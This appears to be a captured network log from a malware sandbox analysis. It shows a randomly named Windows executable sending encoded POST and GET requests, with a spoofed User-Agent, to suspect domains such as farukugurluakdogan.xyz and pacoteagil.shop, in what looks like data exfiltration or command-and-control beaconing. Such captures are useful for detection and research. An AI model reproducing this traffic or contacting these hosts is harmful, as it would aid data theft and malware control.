Aug 31, 2024 14:04:32.685070038 CEST	721	OUT	POST /3yei/ HTTP/1.1 Host: www.farukugurluakdogan.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 205 Cache-Control: no-cache Origin: http://www.farukugurluakdogan.xyz Referer: http://www.farukugurluakdogan.xyz/3yei/ User-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 Data Raw: 5a 58 7a 74 31 6a 64 58 3d 71 62 5a 73 35 74 75 75 55 4f 37 6f 64 7a 33 4a 61 56 62 57 30 49 2f 76 48 4e 37 59 59 7a 42 38 34 4f 4a 76 49 34 37 6f 30 69 4f 4d 32 71 49 76 78 61 50 50 4b 2f 67 64 31 39 57 36 72 31 59 6e 51 48 7a 2f 42 64 41 30 44 77 4d 68 79 6b 64 6f 32 66 51 4c 79 6f 35 44 46 66 4c 6f 6a 30 6c 6d 65 73 41 79 42 59 45 7a 30 38 59 64 4c 5a 73 73 57 6c 43 73 63 42 35 58 31 6b 4b 44 6a 63 64 64 39 75 6e 75 71 44 4b 57 52 4c 33 54 43 4d 37 43 71 39 45 68 68 53 7a 35 34 2f 49 64 75 67 6b 36 50 59 70 45 56 49 46 65 44 43 4e 51 39 33 50 49 33 4a 62 72 45 6c 4a 33 2b 66 72 51 42 46 48 4f 61 41 3d 3d Data Ascii: ZXzt1jdX=qbZs5tuuUO7odz3JaVbW0I/vHN7YYzB84OJvI47o0iOM2qIvxaPPK/gd19W6r1YnQHz/BdA0DwMhykdo2fQLyo5DFfLoj0lmesAyBYEz08YdLZssWlCscB5X1kKDjcdd9unuqDKWRL3TCM7Cq9EhhSz54/Idugk6PYpEVIFeDCNQ93PI3JbrElJ3+frQBFHOaA==
Aug 31, 2024 14:04:33.380223036 CEST	225	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Sat, 31 Aug 2024 12:04:33 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 19 X-Rate-Limit-Reset: 2024-08-31T12:04:38.2690131Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	58103	85.159.66.93	80	3004	C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 14:04:35.223664999 CEST	741	OUT	POST /3yei/ HTTP/1.1 Host: www.farukugurluakdogan.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 225 Cache-Control: no-cache Origin: http://www.farukugurluakdogan.xyz Referer: http://www.farukugurluakdogan.xyz/3yei/ User-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 Data Raw: 5a 58 7a 74 31 6a 64 58 3d 71 62 5a 73 35 74 75 75 55 4f 37 6f 62 6d 2f 4a 58 53 33 57 78 6f 2f 73 43 4e 37 59 42 6a 42 34 34 4f 4e 76 49 35 76 43 30 52 71 4d 32 4c 34 76 79 65 37 50 66 2f 67 64 2b 64 58 77 6c 56 59 75 51 48 2f 64 42 59 41 30 44 77 49 68 79 6b 74 6f 32 75 52 64 77 34 35 4e 4f 2f 4c 71 74 55 6c 6d 65 73 41 79 42 59 42 55 30 38 41 64 4c 4a 63 73 48 30 43 76 56 68 35 57 79 6b 4b 44 6e 63 64 5a 39 75 6d 4c 71 43 48 44 52 4a 2f 54 43 4e 4c 43 71 73 45 67 6f 53 7a 37 38 2f 4a 36 6e 68 5a 6d 4a 49 6b 4a 63 37 68 68 42 52 49 30 78 52 65 53 6d 34 36 38 57 6c 74 45 6a 59 69 6b 4d 47 36 48 42 4c 78 33 4f 51 6a 52 6f 56 6f 31 55 69 73 52 2b 52 53 49 6e 77 51 3d Data Ascii: ZXzt1jdX=qbZs5tuuUO7obm/JXS3Wxo/sCN7YBjB44ONvI5vC0RqM2L4vye7Pf/gd+dXwlVYuQH/dBYA0DwIhykto2uRdw45NO/LqtUlmesAyBYBU08AdLJcsH0CvVh5WykKDncdZ9umLqCHDRJ/TCNLCqsEgoSz78/J6nhZmJIkJc7hhBRI0xReSm468WltEjYikMG6HBLx3OQjRoVo1UisR+RSInwQ=
Aug 31, 2024 14:04:35.922168970 CEST	225	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Sat, 31 Aug 2024 12:04:35 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 18 X-Rate-Limit-Reset: 2024-08-31T12:04:38.2690131Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	58104	85.159.66.93	80	3004	C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 14:04:37.770211935 CEST	10823	OUT	POST /3yei/ HTTP/1.1 Host: www.farukugurluakdogan.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 10305 Cache-Control: no-cache Origin: http://www.farukugurluakdogan.xyz Referer: http://www.farukugurluakdogan.xyz/3yei/ User-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 Data Raw: 5a 58 7a 74 31 6a 64 58 3d 71 62 5a 73 35 74 75 75 55 4f 37 6f 62 6d 2f 4a 58 53 33 57 78 6f 2f 73 43 4e 37 59 42 6a 42 34 34 4f 4e 76 49 35 76 43 30 52 69 4d 32 35 41 76 67 2f 37 50 4e 50 67 64 39 64 58 39 6c 56 5a 75 51 45 50 5a 42 59 46 4c 44 79 41 68 79 47 6c 6f 79 71 46 64 35 34 35 4e 42 66 4c 72 6a 30 6c 4a 65 73 51 4d 42 59 78 55 30 38 41 64 4c 50 51 73 48 6c 43 76 54 68 35 58 31 6b 4b 50 6a 63 63 45 39 75 4f 39 71 43 53 34 52 36 48 54 44 74 62 43 35 75 63 67 30 43 7a 44 78 66 4a 69 6e 68 56 50 4a 49 6f 76 63 36 46 4c 42 57 41 30 68 47 75 45 68 63 32 61 46 54 39 35 68 2f 65 2f 58 6b 61 63 41 37 4a 70 44 31 7a 31 2f 30 42 5a 58 43 31 4e 72 77 57 4a 34 55 64 39 38 36 4a 35 47 49 33 45 74 78 67 62 42 43 66 6f 38 4a 37 30 62 4c 61 51 57 6e 46 55 70 2b 64 35 36 58 46 44 6c 74 6f 76 4f 41 69 53 77 4d 76 54 5a 38 65 34 6e 32 46 51 71 61 59 6b 77 77 56 43 47 70 31 37 76 2b 62 76 6f 39 50 4c 5a 77 67 4b 64 5a 7a 55 63 64 65 30 38 33 49 69 53 77 79 54 37 2f 79 6f 70 53 4f 49 63 48 42 6c 52 4b 42 55 62 [TRUNCATED] Data Ascii: ZXzt1jdX=qbZs5tuuUO7obm/JXS3Wxo/sCN7YBjB44ONvI5vC0RiM25Avg/7PNPgd9dX9lVZuQEPZBYFLDyAhyGloyqFd545NBfLrj0lJesQMBYxU08AdLPQsHlCvTh5X1kKPjccE9uO9qCS4R6HTDtbC5ucg0CzDxfJinhVPJIovc6FLBWA0hGuEhc2aFT95h/e/XkacA7JpD1z1/0BZXC1NrwWJ4Ud986J5GI3EtxgbBCfo8J70bLaQWnFUp+d56XFDltovOAiSwMvTZ8e4n2FQqaYkwwVCGp17v+bvo9PLZwgKdZzUcde083IiSwyT7/yopSOIcHBlRKBUbwvSMu8/YGxj0KzPFJAgxOrAg6Hk3e0rAFMSQyFBmnAyACBLLDfIQPsWGOQpUtlBSlcgvD4tEaRT2NbmokKZb6l1s4s5aT3xbkHfS6rwJq1gSnMVRCcUSSwDyXQZ0+u2P73uAaGrH08j1JFNfOnHVq4QNSu/dcWz5QBi0EruirFonUm7b2EcVqxXHvzqTHEB2+d9soK8/Brn9iNtNgSB5IrzVnA7zh3iKn9hvKJCTdvISsCN5vIsIAriu+vwzyvYpzasKTPhUCNOnouMcKL621oJ0TBm1nkDIM6w+Ws03qQ9m+bn4l5ssRA8EWp2Bwz8YQlxCMix36zUBfK2hIxFAvWEwsPOfbK2xLTuvBg5ZLvbPjKj6h7jAzjL1bOZi69uz3nWYy433d8LUUXno+2Q6OLphoZgIyA4NRZbUnSrVDiTCa53JzbCMq94vUR4V6hFsED92MnMKFzezjI8Xx/RdiAue69Y3bLy/oprVjHmNvTqiJgsrBFi1pFsqv9KlFqQ/ET3iEbD4bzTvsq7zFRtvXCgI1dCIxaszuxD9qVTxIWTGRxLPL6IokHgRTy8JoujPj0D1PioLc5PUPqTerBMhxrkeuTGN/wK0QBa+F3WZ6VQHg0Oelu9FrJahZMXeb4aOwNmNriNpRtXa0V0p4hg8sbeZ4X+cVnPcw5 [TRUNCATED]
Aug 31, 2024 14:04:38.471446991 CEST	225	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Sat, 31 Aug 2024 12:04:38 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 19 X-Rate-Limit-Reset: 2024-08-31T12:04:43.3510227Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	58105	85.159.66.93	80	3004	C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 14:04:40.312494993 CEST	431	OUT	GET /3yei/?ZXzt1jdX=nZxM6ZbVUNvqNiLtXDfR+7LNAf7PNkUZzI4HUL3o8BmDorsgh/n2PsYU59HPtFBmSHz6AM8ZTB8ClF4C+tQS6IhxM8ffpjo9QeQxbJNt08sZUqYfX3nGFAA=&fVU8=HRzx HTTP/1.1 Host: www.farukugurluakdogan.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
Aug 31, 2024 14:04:40.990497112 CEST	225	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Sat, 31 Aug 2024 12:04:40 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 19 X-Rate-Limit-Reset: 2024-08-31T12:04:45.8867537Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	58106	84.32.84.32	80	3004	C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 14:04:46.072741985 CEST	700	OUT	POST /xz0a/ HTTP/1.1 Host: www.pacoteagil.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 205 Cache-Control: no-cache Origin: http://www.pacoteagil.shop Referer: http://www.pacoteagil.shop/xz0a/ User-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 Data Raw: 5a 58 7a 74 31 6a 64 58 3d 63 31 49 76 32 53 58 42 58 55 74 48 50 68 52 49 39 42 44 78 64 44 65 69 66 79 31 6f 49 57 61 70 69 70 72 66 77 58 4b 6b 45 77 5a 4c 34 78 34 44 6d 45 6c 72 73 59 2b 75 32 6b 50 79 4c 59 5a 37 57 68 6b 67 41 61 76 39 48 67 75 74 79 64 61 33 65 4b 76 6d 67 6b 35 53 53 6c 6e 72 55 76 62 71 2f 70 45 47 59 64 46 4c 47 6d 72 45 62 4d 32 39 50 54 58 6b 58 6e 67 47 35 39 4f 41 56 35 61 43 76 55 79 4d 6b 59 45 42 34 4e 51 31 6e 41 58 45 56 59 48 64 32 4d 30 50 2f 47 5a 61 59 56 4f 70 42 34 6f 69 30 69 76 74 65 70 71 77 7a 31 64 30 66 69 6a 75 63 72 44 58 6a 4c 46 52 47 76 65 53 31 77 3d 3d Data Ascii: ZXzt1jdX=c1Iv2SXBXUtHPhRI9BDxdDeify1oIWapiprfwXKkEwZL4x4DmElrsY+u2kPyLYZ7WhkgAav9Hgutyda3eKvmgk5SSlnrUvbq/pEGYdFLGmrEbM29PTXkXngG59OAV5aCvUyMkYEB4NQ1nAXEVYHd2M0P/GZaYVOpB4oi0ivtepqwz1d0fijucrDXjLFRGveS1w==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	58107	84.32.84.32	80	3004	C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 14:04:48.611126900 CEST	720	OUT	POST /xz0a/ HTTP/1.1 Host: www.pacoteagil.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 225 Cache-Control: no-cache Origin: http://www.pacoteagil.shop Referer: http://www.pacoteagil.shop/xz0a/ User-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 Data Raw: 5a 58 7a 74 31 6a 64 58 3d 63 31 49 76 32 53 58 42 58 55 74 48 4f 42 68 49 78 43 72 78 56 44 65 6c 54 53 31 6f 43 32 62 67 69 70 33 66 77 57 4f 30 46 43 4e 4c 34 55 63 44 68 47 64 72 74 59 2b 75 69 30 50 7a 46 34 5a 79 57 68 67 43 41 62 2f 39 48 68 4b 74 79 5a 57 33 66 35 33 70 6a 55 35 4d 61 46 6e 70 61 50 62 71 2f 70 45 47 59 64 68 6c 47 69 48 45 62 63 6d 39 41 52 7a 37 4a 58 67 48 75 4e 4f 41 52 35 61 47 76 55 7a 70 6b 64 73 34 34 50 6f 31 6e 41 48 45 55 4e 7a 65 68 63 30 7a 68 47 59 34 66 32 33 63 48 4b 5a 65 72 42 37 65 52 62 71 6e 32 7a 4d 75 4f 54 43 35 4f 72 6e 6b 2b 4d 4d 6c 4c 73 6a 62 75 31 71 64 49 64 41 50 52 37 4e 6a 72 70 57 54 4e 4f 72 47 48 43 49 3d Data Ascii: ZXzt1jdX=c1Iv2SXBXUtHOBhIxCrxVDelTS1oC2bgip3fwWO0FCNL4UcDhGdrtY+ui0PzF4ZyWhgCAb/9HhKtyZW3f53pjU5MaFnpaPbq/pEGYdhlGiHEbcm9ARz7JXgHuNOAR5aGvUzpkds44Po1nAHEUNzehc0zhGY4f23cHKZerB7eRbqn2zMuOTC5Ornk+MMlLsjbu1qdIdAPR7NjrpWTNOrGHCI=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	58108	84.32.84.32	80	3004	C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 14:04:51.164772987 CEST	10802	OUT	POST /xz0a/ HTTP/1.1 Host: www.pacoteagil.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 10305 Cache-Control: no-cache Origin: http://www.pacoteagil.shop Referer: http://www.pacoteagil.shop/xz0a/ User-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 Data Raw: 5a 58 7a 74 31 6a 64 58 3d 63 31 49 76 32 53 58 42 58 55 74 48 4f 42 68 49 78 43 72 78 56 44 65 6c 54 53 31 6f 43 32 62 67 69 70 33 66 77 57 4f 30 46 43 56 4c 34 6e 6b 44 68 68 4a 72 75 59 2b 75 39 45 50 32 46 34 59 69 57 6c 45 47 41 65 6e 48 48 6a 43 74 7a 36 65 33 4f 38 44 70 34 6b 35 4d 59 46 6e 6b 55 76 62 2f 2f 70 56 4f 59 64 78 6c 47 69 48 45 62 65 75 39 4a 6a 58 37 4c 58 67 47 35 39 4f 4d 56 35 62 52 76 58 44 54 6b 64 6f 6f 34 37 63 31 6e 6b 62 45 57 2f 62 65 69 38 30 31 6b 47 59 65 66 33 4c 31 48 4b 55 76 72 41 2b 57 52 5a 32 6e 37 48 42 72 5a 53 79 6d 53 39 6a 57 73 65 6b 62 4d 63 2f 6a 33 69 2b 48 47 66 31 56 50 59 38 4e 76 61 44 35 4a 39 72 36 5a 31 32 32 4d 62 44 62 72 4f 6a 58 35 50 32 48 33 35 6a 54 59 47 50 62 6f 4b 4c 62 6e 73 57 78 78 78 71 65 50 71 30 34 56 78 67 39 57 4c 59 68 70 54 54 4a 36 56 6e 73 31 52 76 36 75 6e 41 55 50 34 50 5a 78 53 47 6d 4b 31 61 30 39 69 73 7a 36 67 74 6d 37 6d 30 4d 72 55 66 5a 47 75 51 7a 57 7a 51 6b 34 6f 6f 33 53 61 62 30 79 72 70 46 4c 37 71 31 62 [TRUNCATED] Data Ascii: ZXzt1jdX=c1Iv2SXBXUtHOBhIxCrxVDelTS1oC2bgip3fwWO0FCVL4nkDhhJruY+u9EP2F4YiWlEGAenHHjCtz6e3O8Dp4k5MYFnkUvb//pVOYdxlGiHEbeu9JjX7LXgG59OMV5bRvXDTkdoo47c1nkbEW/bei801kGYef3L1HKUvrA+WRZ2n7HBrZSymS9jWsekbMc/j3i+HGf1VPY8NvaD5J9r6Z122MbDbrOjX5P2H35jTYGPboKLbnsWxxxqePq04Vxg9WLYhpTTJ6Vns1Rv6unAUP4PZxSGmK1a09isz6gtm7m0MrUfZGuQzWzQk4oo3Sab0yrpFL7q1b1DYNybr+51RVcnwPe7ZgTIP9JZ745kvi9M16L6BRbg5vV0vzpZKHMe40vi1twClIlEq1oTbsiRBDpkRMAog2GDA8Dp9jbUfUhU8lad5FYrX7cwCwZZOhXZlolpYmSuwghMSKeUfg2bnE007embTG1aQtnJ9OL368GLRBs+ik+B52AZgU6JYUtCqgpOa5BjP2v2q/Xo+/E6MAsUdu6iwXpxsoGvtUcOw8QfDz3Nn6frdlMopDCKupGLzn/UktbMPLtqbx35irYJRAc0DD4qeP5wpSApmgLJ3qXD+b3xysBJZnMzIDAXsd17GrQWKMKl8m0FEMf/2No/8yxHq897RXbQAni8rpnQeuM1CO8Ar9SUrD4XFDiNWd51Fnba/u6Cdvu9ShYjwDqldwQafeGuTjWaBgT3k1ZLXcwL0wAbivjnC2fdxcKdfnKlC7QYPDlsGblLZGh59zIuFHxdFYDWH2zw5Gu3qzyKFtIpthWpKaDmyF5zrY+VOQrOP6OYJFOHkwtsSCbR6AfnFh8wE+5WzFAVEyS6S4skurfgteEEFem45dhq+4CMTHfjTURRpVBG06l5tQpJMsTUGGYDuhxL7hrcl+0LJKAeW10Q0kYojLk+7Q+n+qAozP4YbM0+Xly4KeWnFoUlQu8hMSEG6V9y2Er0MJLtSosyH636 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	58109	84.32.84.32	80	3004	C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 14:04:53.710745096 CEST	424	OUT	GET /xz0a/?fVU8=HRzx&ZXzt1jdX=R3gP1liecH9CEWR58z6vcTu6ZE4CAT74npPRwlq9MC9LpGUhjUlt5tD2zx/yN6MyUXEHC7bzQwr/lImARbHG2FNXY0baa7q+x6BXcM5hNR/AFuKMUDCbLno= HTTP/1.1 Host: www.pacoteagil.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
Aug 31, 2024 14:04:54.158849955 CEST	1236	IN	HTTP/1.1 200 OK Server: hcdn Date: Sat, 31 Aug 2024 12:04:54 GMT Content-Type: text/html Content-Length: 10072 Connection: close Vary: Accept-Encoding alt-svc: h3=":443"; ma=86400 x-hcdn-request-id: db3d2f13bf63dbf3c616b5ff93d5b722-bos-edge1 Expires: Sat, 31 Aug 2024 12:04:53 GMT Cache-Control: no-cache Accept-Ranges: bytes Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED] Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"
Aug 31, 2024 14:04:54.158941984 CEST	1236	IN	Data Raw: 4f 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 Data Ascii: Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600
Aug 31, 2024 14:04:54.158953905 CEST	1236	IN	Data Raw: 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 Data Ascii: x;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-c
Aug 31, 2024 14:04:54.158965111 CEST	672	IN	Data Raw: 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f Data Ascii: r:#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-
Aug 31, 2024 14:04:54.158974886 CEST	1236	IN	Data Raw: 73 79 6e 63 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 7d 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 3d 77 Data Ascii: sync></script><script>function gtag(){dataLayer.push(arguments)}window.dataLayer=window.dataLayer\|\|[],gtag("js",new Date),gtag("config","UA-26575989-44")</script><nav class="navbar navbar-inverse"><div class=container-fluid style="padding:0 32
Aug 31, 2024 14:04:54.158986092 CEST	1236	IN	Data Raw: 6f 67 69 6e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 6e 61 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 65 6d 70 74 79 2d 61 63 63 6f 75 6e 74 2d 70 61 67 65 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6e 74 61 Data Ascii: ogin</a></li></ul></div></div></nav><div class=empty-account-page><div class=container><div class="col-xs-12 top-container"><div class=message><h2 id=pathName><i></i></h2><div class=message-subtitle>Happy to see your domain with Hostinger!</di
Aug 31, 2024 14:04:54.158997059 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 2e 68 6f 73 74 69 6e 67 65 72 2e 63 6f 6d 2f 65 6e 2f 61 72 74 69 63 6c 65 73 2f 31 35 38 33 32 31 34 2d 68 6f 77 2d 74 6f 2d 61 64 64 2d 61 2d 64 6f 6d 61 69 6e 2d 74 6f 2d 6d 79 2d 61 63 63 6f 75 6e 74 2d 68 6f 77 2d 74 6f 2d Data Ascii: upport.hostinger.com/en/articles/1583214-how-to-add-a-domain-to-my-account-how-to-add-website rel=nofollow>Add a website</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title>Change
Aug 31, 2024 14:04:54.159007072 CEST	1236	IN	Data Raw: 68 2e 66 6c 6f 6f 72 28 72 2f 37 30 30 29 3a 72 3e 3e 31 2c 72 2b 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 72 2f 65 29 2c 74 3d 30 3b 34 35 35 3c 72 3b 74 2b 3d 6f 29 72 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 72 2f 33 35 29 3b 72 65 74 75 72 6e 20 4d 61 Data Ascii: h.floor(r/700):r>>1,r+=Math.floor(r/e),t=0;455<r;t+=o)r=Math.floor(r/35);return Math.floor(t+36*r/(r+38))}this.decode=function(e,t){var a,h,f,i,c,u,d,l,p,g,s,C,w,v,m=[],y=[],E=e.length;for(a=128,f=0,i=72,(c=e.lastIndexOf("-"))<0&&(c=0),u=0;u<c
Aug 31, 2024 14:04:54.159019947 CEST	1088	IN	Data Raw: 5d 3d 74 5b 64 5d 21 3d 77 5b 64 5d 3b 76 61 72 20 6d 2c 79 3d 5b 5d 3b 66 6f 72 28 68 3d 31 32 38 2c 75 3d 37 32 2c 64 3d 66 3d 30 3b 64 3c 76 3b 2b 2b 64 29 74 5b 64 5d 3c 31 32 38 26 26 79 2e 70 75 73 68 28 53 74 72 69 6e 67 2e 66 72 6f 6d 43 Data Ascii: ]=t[d]!=w[d];var m,y=[];for(h=128,u=72,d=f=0;d<v;++d)t[d]<128&&y.push(String.fromCharCode(w?(m=t[d],(m-=(m-97<26)<<5)+((!w[d]&&m-65<26)<<5)):t[d]));for(i=c=y.length,0<c&&y.push("-");i<v;){for(l=r,d=0;d<v;++d)h<=(C=t[d])&&C<l&&(l=C);if(l-h>Math

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
